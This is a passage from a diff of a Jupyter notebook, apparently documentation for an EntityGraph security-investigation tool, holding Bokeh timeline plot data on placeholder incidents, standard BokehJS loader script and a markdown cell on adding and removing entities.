%H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2424\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"overlay\":{\"id\":\"2433\"},\"x_range\":{\"id\":\"2367\"},\"y_range\":null},\"id\":\"2432\",\"type\":\"RangeTool\"},{\"attributes\":{\"data\":{\"Center\":{\"__ndarray__\":\"AHBfX5nDd0IAAGV5xsN3Qq6hX2iNwXdC9ozlaMHDd0Ja6sb6oMN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Description\":[\"2021-10-01T17:52:21.5763494Z - qdbbijed - lciaqlfodrimcjjcckdppidjrnoobqllnafe\",\"2021-10-01T17:44:44.4768467Z - mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela - nmejajbiqrpqkqlbjqedrrqndlmrppldoibd\",\"2021-10-01T17:29:50.1999887Z - naebofkqlmonbrmloaonffmdjipln - ppffjqndimadciqjqqkakaabjabcfbilraeb\",\"2021-10-01T16:52:35.8429041Z - qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp - dbkkfqcdnbciapjajpbdbimroidmfqljfmjd\",\"2021-10-01T16:49:43.6929517Z - ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje - ppfnqmqlakpmqcnnnniofmjoomenilncrqfj\"],\"EndTime\":{\"__ndarray__\":\"AIDUccnDd0IAAGV5xsN3Qq6hnzDOw3dC9owp/snDd0Ja6hrly8N3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Name\":[\"qdbbijed\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"naebofkqlmonbrmloaonffmdjipln\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\",\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\"],\"Row\":[3,1,2,4,0],\"StartTime\":{\"__ndarray__\":\"AGDqTGnDd0IAAGV5xsN3Qq6hH6BMv3dC9oyh07jDd0Ja6nIQdsN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"TimeGenerated\":{\"__ndarray__\":\"loUkxc/Dd0KJzYtVz8N3Qs9/N3vOw3dCdy64WczDd0I3z7AvzMN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Type\":[\"incident\",\"incident\",\"incident\",\"incident\",\"incident\"],\"Width\":{\"__ndarray__\":\"AAAAiDoJmEEAAAAAAAAAAAAAAABCBtJBAAAAAIgqcUEAAAAAKnWVQQ==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"end_time\":{\"__ndarray__\":\"AIDUccnDd0IAAGV5xsN3Qq6hnzDOw3dC9owp/snDd0Ja6hrly8N3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"index\":[0,1,2,3,4],\"start_time\":{\"__ndarray__\":\"AGDqTGnDd0IAAGV5xsN3Qq6hH6BMv3dC9oyh07jDd0Ja6nIQdsN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]}},\"selected\":{\"id\":\"2489\"},\"selection_policy\":{\"id\":\"2490\"}},\"id\":\"2426\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"children\":[{\"id\":\"2364\"},{\"id\":\"2407\"}]},\"id\":\"2439\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"2442\",\"type\":\"AllLabels\"},{\"attributes\":{\"data_source\":{\"id\":\"2426\"},\"glyph\":{\"id\":\"2428\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2429\"},\"view\":{\"id\":\"2431\"}},\"id\":\"2430\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2492\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2494\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"StartTime\"},\"y\":{\"field\":\"Row\"}},\"id\":\"2429\",\"type\":\"Circle\"},{\"attributes\":{\"data\":{\"Center\":{\"__ndarray__\":\"WurG+qDDd0IAAGV5xsN3Qq6hX2iNwXdCAHBfX5nDd0L2jOVowcN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"Name\":[\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"naebofkqlmonbrmloaonffmdjipln\",\"qdbbijed\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\"],\"Row\":[0,1,2,3,4],\"Width\":{\"__ndarray__\":\"AAAAACp1lUEAAAAAAAAAAAAAAABCBtJBAAAAiDoJmEEAAAAAiCpxQQ==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"end_time\":{\"__ndarray__\":\"Wuoa5cvDd0IAAGV5xsN3Qq6hnzDOw3dCAIDUccnDd0L2jCn+ycN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]},\"index\":[0,1,2,3,4],\"start_time\":{\"__ndarray__\":\"WupyEHbDd0IAAGV5xsN3Qq6hH6BMv3dCAGDqTGnDd0L2jKHTuMN3Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[5]}},\"selected\":{\"id\":\"2472\"},\"selection_policy\":{\"id\":\"2473\"}},\"id\":\"2361\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2495\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2499\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2497\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"StartTime\"},\"y\":{\"field\":\"Row\"}},\"id\":\"2428\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2496\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"2426\"}},\"id\":\"2431\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2498\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":5},\"x\":{\"field\":\"StartTime\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2401\"}}},\"id\":\"2404\",\"type\":\"Scatter\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@end_time\":\"datetime\",\"@start_time\":\"datetime\"},\"tooltips\":[[\"Name\",\"@Name\"],[\"start_time\",\"@start_time{%F %T.%3N}\"],[\"end_time\",\"@end_time{%F %T.%3N}\"],[\"Name\",\"@Name\"],[\"Description\",\"@Description\"],[\"Type\",\"@Type\"],[\"TimeGenerated\",\"@TimeGenerated\"]]},\"id\":\"2363\",\"type\":\"HoverTool\"},{\"attributes\":{\"data_source\":{\"id\":\"2361\"},\"glyph\":{\"id\":\"2397\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2398\"},\"view\":{\"id\":\"2400\"}},\"id\":\"2399\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2371\",\"type\":\"LinearScale\"},{\"attributes\":{\"range\":null,\"value\":0.5},\"id\":\"2401\",\"type\":\"Dodge\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2382\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2380\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"2373\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"2450\",\"type\":\"NodesOnly\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"value\":0.3},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"width\":{\"field\":\"Width\"},\"x\":{\"field\":\"Center\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2395\"}}},\"id\":\"2398\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"2449\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"2384\",\"type\":\"ResetTool\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"2363\"},{\"id\":\"2382\"},{\"id\":\"2383\"},{\"id\":\"2384\"},{\"id\":\"2385\"},{\"id\":\"2386\"}]},\"id\":\"2388\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"2443\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"source\":{\"id\":\"2361\"}},\"id\":\"2400\",\"type\":\"CDSView\"},{\"attributes\":{\"below\":[{\"id\":\"2311\"}],\"center\":[{\"id\":\"2314\"},{\"id\":\"2318\"},{\"id\":\"2350\"},{\"id\":\"2351\"},{\"id\":\"2352\"},{\"id\":\"2353\"},{\"id\":\"2354\"},{\"id\":\"2355\"},{\"id\":\"2356\"},{\"id\":\"2357\"},{\"id\":\"2358\"},{\"id\":\"2359\"}],\"height\":800,\"left\":[{\"id\":\"2315\"}],\"renderers\":[{\"id\":\"2335\"}],\"title\":{\"id\":\"2301\"},\"toolbar\":{\"id\":\"2326\"},\"width\":800,\"x_range\":{\"id\":\"2303\"},\"x_scale\":{\"id\":\"2307\"},\"y_range\":{\"id\":\"2305\"},\"y_scale\":{\"id\":\"2309\"}},\"id\":\"2300\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"overlay\":{\"id\":\"2387\"}},\"id\":\"2383\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"2362\"},\"glyph\":{\"id\":\"2403\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2404\"},\"view\":{\"id\":\"2406\"}},\"id\":\"2405\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"2342\"},\"inspection_policy\":{\"id\":\"2449\"},\"layout_provider\":{\"id\":\"2344\"},\"node_renderer\":{\"id\":\"2338\"},\"selection_policy\":{\"id\":\"2450\"}},\"id\":\"2335\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2386\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"2385\",\"type\":\"SaveTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":5},\"x\":{\"field\":\"StartTime\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2401\"}}},\"id\":\"2403\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"2461\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2437\"},\"major_label_policy\":{\"id\":\"2464\"},\"ticker\":{\"id\":\"2376\"}},\"id\":\"2375\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"axis\":{\"id\":\"2379\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"2381\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"2462\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"axis_label\":\"Name\",\"formatter\":{\"id\":\"2462\"},\"major_label_policy\":{\"id\":\"2461\"},\"ticker\":{\"id\":\"2380\"}},\"id\":\"2379\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2477\"},{\"id\":\"2478\"},{\"id\":\"2479\"},{\"id\":\"2480\"},{\"id\":\"2481\"},{\"id\":\"2482\"},{\"id\":\"2483\"},{\"id\":\"2484\"},{\"id\":\"2485\"},{\"id\":\"2486\"},{\"id\":\"2487\"},{\"id\":\"2488\"}]},\"id\":\"2376\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2375\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2378\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"value\":0.3},\"line_color\":{\"value\":\"navy\"},\"width\":{\"field\":\"Width\"},\"x\":{\"field\":\"Center\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2395\"}}},\"id\":\"2397\",\"type\":\"Rect\"},{\"attributes\":{\"factors\":[\"ecfclmeoanpmiadpfakedjrneofreeoqlmalrdbopjomadpabrccoaklapbbffje\",\"mmejikifrklncqnamleekfcnmdmfqfrcelcbkbcdbmlrekcloppeeela\",\"naebofkqlmonbrmloaonffmdjipln\",\"qdbbijed\",\"qmlcpkdleidqcpqonpcboelqmdcdkjbmnqdnp\"]},\"id\":\"2369\",\"type\":\"FactorRange\"},{\"attributes\":{\"text\":\"Timeline: Entity Timeline\"},\"id\":\"2365\",\"type\":\"Title\"},{\"attributes\":{\"end\":1633230044666.106,\"start\":1631778524666.106},\"id\":\"2367\",\"type\":\"Range1d\"},{\"attributes\":{\"range\":null,\"value\":0.5},\"id\":\"2395\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"2464\",\"type\":\"AllLabels\"},{\"attributes\":{\"below\":[{\"id\":\"2375\"}],\"center\":[{\"id\":\"2378\"},{\"id\":\"2381\"}],\"height\":300,\"left\":[{\"id\":\"2379\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"2399\"},{\"id\":\"2405\"}],\"title\":{\"id\":\"2365\"},\"toolbar\":{\"id\":\"2388\"},\"width\":800,\"x_range\":{\"id\":\"2367\"},\"x_scale\":{\"id\":\"2371\"},\"y_range\":{\"id\":\"2369\"},\"y_scale\":{\"id\":\"2373\"}},\"id\":\"2364\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"2333\",\"type\":\"HoverTool\"}],\"root_ids\":[\"2440\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"f6abf2b1-c950-4a4d-998e-5ea6704b3506\",\"root_ids\":[\"2440\"],\"roots\":{\"2440\":\"161010f6-3f0f-4ea7-a749-7b44d390299e\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2440"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'2440', <span id=\"2832\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='2300', ...), Column(id='2439', ...)],</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"2831\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2832\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2831\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Column(id='2440', ...)"
+      ]
+     },
+     "execution_count": 9,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "df_graph.plot_with_timeline()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Adding and Removing Entities\n",
+    "\n",
+    "During an investigation, you will want to expand or collapse the graph based on the outcomes of your investigations. The EntityGraph supports the ability to add and remove entities from the graph during the investigation. \n",
+    "Entities that are added with the `add_entity` or `add_incident` functions, depending on whether the item being added is an incident or an entity. Added entities can be attached to another entity in the graph by specifying the name of the entity to attach to with the `attached_to` parameter."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3387\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3387\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n    